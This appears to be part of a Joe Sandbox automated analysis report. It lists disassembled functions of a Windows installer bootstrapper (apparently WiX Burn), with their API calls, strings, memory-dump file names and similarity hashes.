Function 00B9140C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00B90A19,?,?,?), ref: 00B91434
GetLastError.KERNEL32(?,00B90A19,?,?,?), ref: 00B9143E

Strings

cabextract.cpp, xrefs: 00B91462
Failed to move to virtual file pointer., xrefs: 00B9146C

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: Failed to move to virtual file pointer.$cabextract.cpp
API String ID: 2976181284-3005670968
Opcode ID: 0d49f23d58d212cd401951f23480b49a424656662a6caac2c474a934c5e24bcd
Instruction ID: a68078be43c4f4b3697f5d457e45c133e5adf7f42cb188e4cff859ad906e84b3
Opcode Fuzzy Hash: 0d49f23d58d212cd401951f23480b49a424656662a6caac2c474a934c5e24bcd
Instruction Fuzzy Hash: 9701D43394063B7B8B215A999C08E9BBFA4EF0477071185A5FD2856310DB719C10DAD4

Function 00B907B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(00BBB478,00000000,?,00B91717,?,00000000,?,00B7C287,?,00B75405,?,00B875A5,?,?,00B75405,?), ref: 00B907BF
GetLastError.KERNEL32(?,00B91717,?,00000000,?,00B7C287,?,00B75405,?,00B875A5,?,?,00B75405,?,00B75445,00000001), ref: 00B907C9

Strings

cabextract.cpp, xrefs: 00B907ED
Failed to set begin operation event., xrefs: 00B907F7

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorEventLast
String ID: Failed to set begin operation event.$cabextract.cpp
API String ID: 3848097054-4159625223
Opcode ID: 05e737ba34f2330465f37260884aedb4cab50d7f71bfba495c5f05bdf8328574
Instruction ID: 6138506558d65b99827656fffde218edc5d98c6c4512451b1f73caef1931b303
Opcode Fuzzy Hash: 05e737ba34f2330465f37260884aedb4cab50d7f71bfba495c5f05bdf8328574
Instruction Fuzzy Hash: 3CF05C33A522356B8B2032D55C0AFDFBAD49F05F7070141F5FE01B7250EAA4AC00C6E6

Function 00B75123 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(burn.clean.room,?,?,?,?,00B71104,?,?,00000000), ref: 00B75142
CompareStringW.KERNELBASE(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,?,00B71104,?,?,00000000), ref: 00B75172

Strings

burn.clean.room, xrefs: 00B7512F, 00B7513C, 00B75169

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: CompareStringlstrlen
String ID: burn.clean.room
API String ID: 1433953587-3055529264
Opcode ID: 71a59899a551cefc348826b0a913a66a1e578c3f810c5b699ca312cef20985a7
Instruction ID: 16b1d8abd0804d9cc94be8f3d276ec9129adbffdee4a50c5d053d1169ca69bfe
Opcode Fuzzy Hash: 71a59899a551cefc348826b0a913a66a1e578c3f810c5b699ca312cef20985a7
Instruction Fuzzy Hash: 830162725016256F87304B489D94E73FBECE715761B508216F51DF3A10EBF0AC41CAA1

Function 00B73838 Relevance: 4.6, APIs: 3, Instructions: 80libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00B73877
GetLastError.KERNEL32 ref: 00B73881
LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 00B738EA

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: DirectoryErrorLastLibraryLoadSystem
String ID:
API String ID: 1230559179-0
Opcode ID: 3e10fce18486990ff8cc0f0bf5b787a70de6dfd3a5046bbb4b15d560abbebc6e
Instruction ID: 4463be6fa29524781d404b4b09a438d6ba76e67898578a27df17fddd4a40c1f3
Opcode Fuzzy Hash: 3e10fce18486990ff8cc0f0bf5b787a70de6dfd3a5046bbb4b15d560abbebc6e
Instruction Fuzzy Hash: BC21C8B2D0123DA7DB209B659C45F9A77E8DB04B10F1182E5BE29F7241DAB0DE449BD0

Function 00B73A16 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00B73BB6,00000000,?,00B71474,00000000,80004005,00000000,80004005,00000000,000001C7,?,00B713B8), ref: 00B73A20
RtlFreeHeap.NTDLL(00000000,?,00B73BB6,00000000,?,00B71474,00000000,80004005,00000000,80004005,00000000,000001C7,?,00B713B8,000001C7,00000100), ref: 00B73A27
GetLastError.KERNEL32(?,00B73BB6,00000000,?,00B71474,00000000,80004005,00000000,80004005,00000000,000001C7,?,00B713B8,000001C7,00000100,?), ref: 00B73A31

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: Heap$ErrorFreeLastProcess
String ID:
API String ID: 406640338-0
Opcode ID: a70e6426e3d87b6057c5dad5fa6508487b687e16781c9384d2255d4707b836b0
Instruction ID: 60b44fc862dd05d9c94481d88174e182f268f3dd9c15cf92a8b8be5843165b3e
Opcode Fuzzy Hash: a70e6426e3d87b6057c5dad5fa6508487b687e16781c9384d2255d4707b836b0
Instruction Fuzzy Hash: EFD01273A0413957872117EE9C5DD5B7EDCEF04AA17014225FD59E7220DBA5CD0096E4

Function 00B7F755 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00BDAAA0,00000000,?,00BB57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00BB0F80

RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,00000000,?,?,?,00B87D59,?,?,?), ref: 00B7F7B9

Part of subcall function 00BB1026: RegQueryValueExW.ADVAPI32(00000004,?,00000000,00000000,?,00000000,?,00000000,?,?,?,00B7F78E,00000000,Installed,00000000,?), ref: 00BB104B

Strings

Installed, xrefs: 00B7F781

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Installed
API String ID: 3677997916-3662710971
Opcode ID: 0e91d6116ddd9b2358fe6ea7ee52927c417a623e9de816c217c0750b9aa852a8
Instruction ID: 54b91ae8b5053ef574a6dd36e5c844f22293cab7564ee43e6a2e2041dea0df39
Opcode Fuzzy Hash: 0e91d6116ddd9b2358fe6ea7ee52927c417a623e9de816c217c0750b9aa852a8
Instruction Fuzzy Hash: B0018F32920119EFCB15EBA8C846FEEBBF8EF04751F1181E4E814A7110D7759E40D794

Function 00BB0F6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00BDAAA0,00000000,?,00BB57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00BB0F80

Strings

regutil.cpp, xrefs: 00BB0FC3

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: Open
String ID: regutil.cpp
API String ID: 71445658-955085611
Opcode ID: c7fbd9856fd105d57a90cfa0ef6f3fea88494668550c3b26598cd616cb3ec4c6
Instruction ID: 8e4bf72b602adb369052d56e89eabb5edc64801b86a61af053ad8b03b2c4ee3d
Opcode Fuzzy Hash: c7fbd9856fd105d57a90cfa0ef6f3fea88494668550c3b26598cd616cb3ec4c6
Instruction Fuzzy Hash: C2F0F633711132679B3025568C05BFBFAD9DB947B0F1981A6BD4A9A250E6E1CC00E6F0

Function 00B73AF0 Relevance: 3.0, APIs: 2, Instructions: 14memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,000001C7,?,?,00B7226D,?,000001C7,00000001,80004005,8007139F,?,?,00BB0267,8007139F,?,00000000), ref: 00B73B04
RtlReAllocateHeap.NTDLL(00000000,?,00B7226D,?,000001C7,00000001,80004005,8007139F,?,?,00BB0267,8007139F,?,00000000,00000000,8007139F), ref: 00B73B0B

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 6a05f5205499f420ae5944c99336abe6060f41fb0ddfbff33cb01bc32849aacc
Instruction ID: a5569e33444d61c1ecb4e0f101e46aa07519653aa69d1d6c40b7172948ab975c
Opcode Fuzzy Hash: 6a05f5205499f420ae5944c99336abe6060f41fb0ddfbff33cb01bc32849aacc
Instruction Fuzzy Hash: 97D0C93216420DAB8F005FE8DC0EDAA3BACEB586027048509B915D2120CBB9E4209A60

Function 00B7394F Relevance: 3.0, APIs: 2, Instructions: 13memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,000001C7,?,00B72274,000001C7,00000001,80004005,8007139F,?,?,00BB0267,8007139F,?,00000000,00000000,8007139F), ref: 00B73960
RtlAllocateHeap.NTDLL(00000000,?,00B72274,000001C7,00000001,80004005,8007139F,?,?,00BB0267,8007139F,?,00000000,00000000,8007139F), ref: 00B73967

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: defc4eab5127a04a752bbb46e6f91b73ec2319698704ce372b268688f0aa2ef8
Instruction ID: d0ff17146a254f6675c17010657b29fecaa82b898e001806e2df7ea6ac7d47aa
Opcode Fuzzy Hash: defc4eab5127a04a752bbb46e6f91b73ec2319698704ce372b268688f0aa2ef8
Instruction Fuzzy Hash: C0C012321A420CAB8B006FF8EC0EC9A3BACBB286027048600B906D3120CBB8E0108B60

Function 00BB35C3 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00BB35F8

Part of subcall function 00BB304F: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00BB3609,00000000,?,00000000), ref: 00BB3069
Part of subcall function 00BB304F: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00B9C025,?,00B75405,?,00000000,?), ref: 00BB3075

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorHandleInitLastModuleVariant
String ID:
API String ID: 52713655-0
Opcode ID: 00360d6fde79a40e034abf442f52a82f831d039df22c07f4bf45f837704e8355
Instruction ID: 47186b74677612d7633022b3215d67f745171b69ac89968faa70ba7967f5f49b
Opcode Fuzzy Hash: 00360d6fde79a40e034abf442f52a82f831d039df22c07f4bf45f837704e8355
Instruction Fuzzy Hash: E9313076D01229AFCB11DFA8D884AEEF7F4EF08710F0145AAED15BB311DA759D008BA4

Function 00BB5870 Relevance: 1.6, APIs: 1, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(80070490,00000000,80070490,00BDAAA0,00000000,80070490,?,?,00B88B19,WiX\Burn,PackageCache,00000000,00BDAAA0,00000000,00000000,80070490), ref: 00BB58CA

Part of subcall function 00BB10B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00BB112B
Part of subcall function 00BB10B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00BB1163

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: QueryValue$Close
String ID:
API String ID: 1979452859-0
Opcode ID: 5476ca43351fc4bf63192eec0224941cbe413fb7d6e2c9d31cf62606559a28a7
Instruction ID: 33338f391a90415e310d052f980e922022416afdc1f42d7ee761664c8dfa55e1
Opcode Fuzzy Hash: 5476ca43351fc4bf63192eec0224941cbe413fb7d6e2c9d31cf62606559a28a7
Instruction Fuzzy Hash: 7F11A336800669EF8F316E98DC41BFEB7E8EF04320B1141B9ED4167111C7B24E50D6D2

Function 00BA5305 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00BA6213,00000001,00000364), ref: 00BA5346

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f83cb932fa2af0067ca0241ca01b3b30fe143398871d6ed3a8fa0497700e1fb9
Instruction ID: 20e1ae8861709b8306934bd3c5a4a852e8a131f90754428cf92f1e9def92bb3a
Opcode Fuzzy Hash: f83cb932fa2af0067ca0241ca01b3b30fe143398871d6ed3a8fa0497700e1fb9
Instruction Fuzzy Hash: 0FF0BB3210D9246BDF311A259C05B5A77C8EFC37F0B1891A1B816A7191DBF0DE0041A8

Function 00B734B5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,00B88BD3,0000001C,80070490,00000000,00000000,80070490), ref: 00B734D5

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: c31b96d56f7bcb5534c71c7f66c07673c083c9876329ad29dac6fbf763548ec9
Instruction ID: 7c6300585a1c95c8663bddfd2d83bec401c4ea4ac130778f65ed37046e65b606
Opcode Fuzzy Hash: c31b96d56f7bcb5534c71c7f66c07673c083c9876329ad29dac6fbf763548ec9
Instruction Fuzzy Hash: CBE012B22411247FEA122F65AC05DAB7BDC9F05754700C491BE58D6110D762D65096B4

Function 00BAF4AA Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BAF491

Part of subcall function 00BB998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BB9A09
Part of subcall function 00BB998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BB9A1A

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 022b1570d18977854331204d96fa5f99259d17f932da625bcfdf7604cfe1b638
Instruction ID: cbc7bd734661fc32d0db87fcdde8e64b42aa33f0db2698ac60b551c3b910b91a
Opcode Fuzzy Hash: 022b1570d18977854331204d96fa5f99259d17f932da625bcfdf7604cfe1b638
Instruction Fuzzy Hash: 79B012A226D9036D328451541C52C77C1CCC1CAF6233082EFF080C1390FCC00C400032

Function 00BAF49A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BAF491

Part of subcall function 00BB998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BB9A09
Part of subcall function 00BB998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BB9A1A

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 997bc3272424e47407511a31deaea9c60d4400275066cc9ec9a4f8ec4bcfcbab
Instruction ID: 0b068fe2a9c5c7f77883138de0e07c50e7ea996015e32f9b0932629a7116b99a
Opcode Fuzzy Hash: 997bc3272424e47407511a31deaea9c60d4400275066cc9ec9a4f8ec4bcfcbab
Instruction Fuzzy Hash: 24B012A226D8036E328451541D53C77C1CCC1CAF6233041EFB080C1390FCC40C010032

Function 00BAF479 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BAF491

Part of subcall function 00BB998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BB9A09
Part of subcall function 00BB998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BB9A1A

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 69010eaea667bde0e34976c279744dc1c121e8ed8480d3d4bd8224dff48ac6d1
Instruction ID: 25e94ad5f9ee94d91a400071192e5af356b556a9dfb6f1842469a172f75f91a4
Opcode Fuzzy Hash: 69010eaea667bde0e34976c279744dc1c121e8ed8480d3d4bd8224dff48ac6d1
Instruction Fuzzy Hash: C1B012A626D8037D324411501C52C77C1CCC1C6F62330C2EFB480C0290BCC00C010072

Function 00BB9684 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BB966B

Part of subcall function 00BB998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BB9A09
Part of subcall function 00BB998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BB9A1A

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f4a004a3736f276a202e522bb105e81c2a6d7f81874c8480b1c2bd58a113e2e6
Instruction ID: aa2e31bd0dfc86cf95481ebfd4c3d4fa87784d09bda84220caa839c3dead4c68
Opcode Fuzzy Hash: f4a004a3736f276a202e522bb105e81c2a6d7f81874c8480b1c2bd58a113e2e6
Instruction Fuzzy Hash: C6B012922682016F3B8451442EC3DB782CCC5C1F1233041DFB145D1290F8C44C054132

Function 00BB9674 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BB966B

Part of subcall function 00BB998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BB9A09
Part of subcall function 00BB998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BB9A1A

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d2360dbac5b12d07dce13fa5da7ca5b792d84c29889e335d35f5f76351bcb1ad
Instruction ID: e9152974c67cbbaa883cd18fe2d7a83e92b2da43eba74ab64ff719e650f331bb
Opcode Fuzzy Hash: d2360dbac5b12d07dce13fa5da7ca5b792d84c29889e335d35f5f76351bcb1ad
Instruction Fuzzy Hash: 69B012922680026F378451041C87CB786CCC1C1B12330C1DFB545C1290F8C04C094132

Function 00BB9653 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BB966B

Part of subcall function 00BB998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BB9A09
Part of subcall function 00BB998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BB9A1A

Memory Dump Source

